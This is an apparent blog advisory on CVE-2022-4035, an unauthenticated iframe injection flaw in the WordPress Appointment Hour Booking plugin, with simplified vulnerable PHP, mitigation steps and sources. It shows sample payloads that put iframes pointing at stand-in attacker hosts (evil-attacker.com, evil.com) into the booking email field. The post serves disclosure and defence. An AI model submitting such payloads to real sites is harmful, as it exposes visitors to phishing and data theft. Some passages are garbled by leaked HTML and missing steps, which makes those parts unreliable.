CVE CyberSecurity Database News

CVE-2022-4035 - How iFrame Injection in Appointment Hour Booking Plugin Lets Attackers Hack Your WordPress Site

Poster -

WordPress plugins are awesome for adding features to your website. But sometimes, even trusted plugins can have security holes that let hackers in. CVE-2022-4035 is one such vulnerability in the *Appointment Hour Booking* plugin, affecting everything up to version 1.3.72.

In this post, I’ll explain what this bug is, how it works, show code snippets to illustrate the problem, discuss real attack scenarios, and help you secure your site—using simple, straightforward language. If you want the nitty-gritty details, I’ll also link to official sources and further reading.

What is Appointment Hour Booking?

The Appointment Hour Booking plugin is a popular WordPress add-on that lets visitors book appointments through a custom form. Businesses use it for haircuts, doctor visits, consulting sessions, and more. All bookings get saved and can be reviewed by admins (or sometimes customers) later.

What Is CVE-2022-4035?

CVE-2022-4035 is a security issue where attackers can inject harmful HTML <iframe> tags into the booking system—using the email or general fields in the booking form.

Affected Versions: Up to and including 1.3.72  
Patched in: 1.3.73  
Official advisory: Wordfence Report  
CVE Entry: NVD CVE-2022-4035

No user login needed! Anyone can do this.

- Attackers can inject  tags, which can show phishing pages, malicious ads, or steal your user's data.</p><h2>Technical Background: How Does This Work?</h2><p>The plugin’s booking forms don’t properly clean (sanitize) or escape whatever text users put in general fields, like *email*. That means an attacker can put HTML tags—in this case, <i>&lt;iframe&gt;</i> tags—into these fields.</p><h2>When the plugin takes in the email field, it just stores whatever is sent from the form</h2><p><pre><code class="language-php">// Hypothetical code — simplified for clarity $email = $_POST[&#039;email&#039;]; // Takes user input as is save_booking($email);     // Stores it directly in database </code></pre>When someone views the booking (user or admin), the plugin simply prints this value without escaping it:<br><br><pre><code class="language-php">// Again, simplified for clarity echo get_booking_email($booking_id); // Outputs raw value, no escaping! </code></pre></p><h2><i></i>`html</h2><p>   <iframe src="<a href="https://evil-attacker.com/phishing.html" rel="nofollow">https://evil-attacker.com/phishing.html</a>" width="500" height="500">

The plugin saves this as the "email" of the booking.

4. ANYTIME someone sees this booking (admin dashboard, confirmation, customer view), the iframe is rendered. This displays the attacker's content inside your site's trusted space.

*Name:* Alice

- *Email:* <iframe src="https://evil.com/steal.html"; width="400" height="200"></iframe>

Submit.


Result: Anyone viewing the booking record will see the attacker's iframe load in the page.

Why is this dangerous?

- Attackers can use the iframe to run *phishing forms*, *evil JavaScript*, or *fake login screens* inside your real website.
- Since it’s inside your web app, people are more likely to trust and interact with malicious content.

1. Update the Plugin

The plugin author released a fix in version 1.3.73. *Updating the plugin removes the vulnerability!*  
- Get the latest version here

2. Sanitize All Input

Developers: Always use WordPress functions like sanitize_email(), esc_html(), or esc_attr() when handling user input and displaying it.

3. Audit for Malicious Bookings

- Go through existing bookings. Look for odd-looking email fields (any < or > should raise an alarm).

4. Install Security Plugins

- Use security plugins like Wordfence or Sucuri to scan your site for vulnerabilities and malicious content.

Resources and References

- Wordfence Threat Intelligence: CVE-2022-4035
- National Vulnerability Database Entry
- Appointment Hour Booking - WordPress Plugin

Conclusion

CVE-2022-4035 is a serious, but now-fixed, vulnerability in Appointment Hour Booking that allowed anyone to inject malicious iframes into your booking system. If you use this plugin, be sure to update it right away, scan for bad content, and always keep your site’s plugins up-to-date.

Security is everyone’s business—never let your guard down, and when in doubt, update!


*Feel free to share this post with anyone you know running the Appointment Hour Booking plugin. Awareness saves websites!*

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 22:08:00 UTC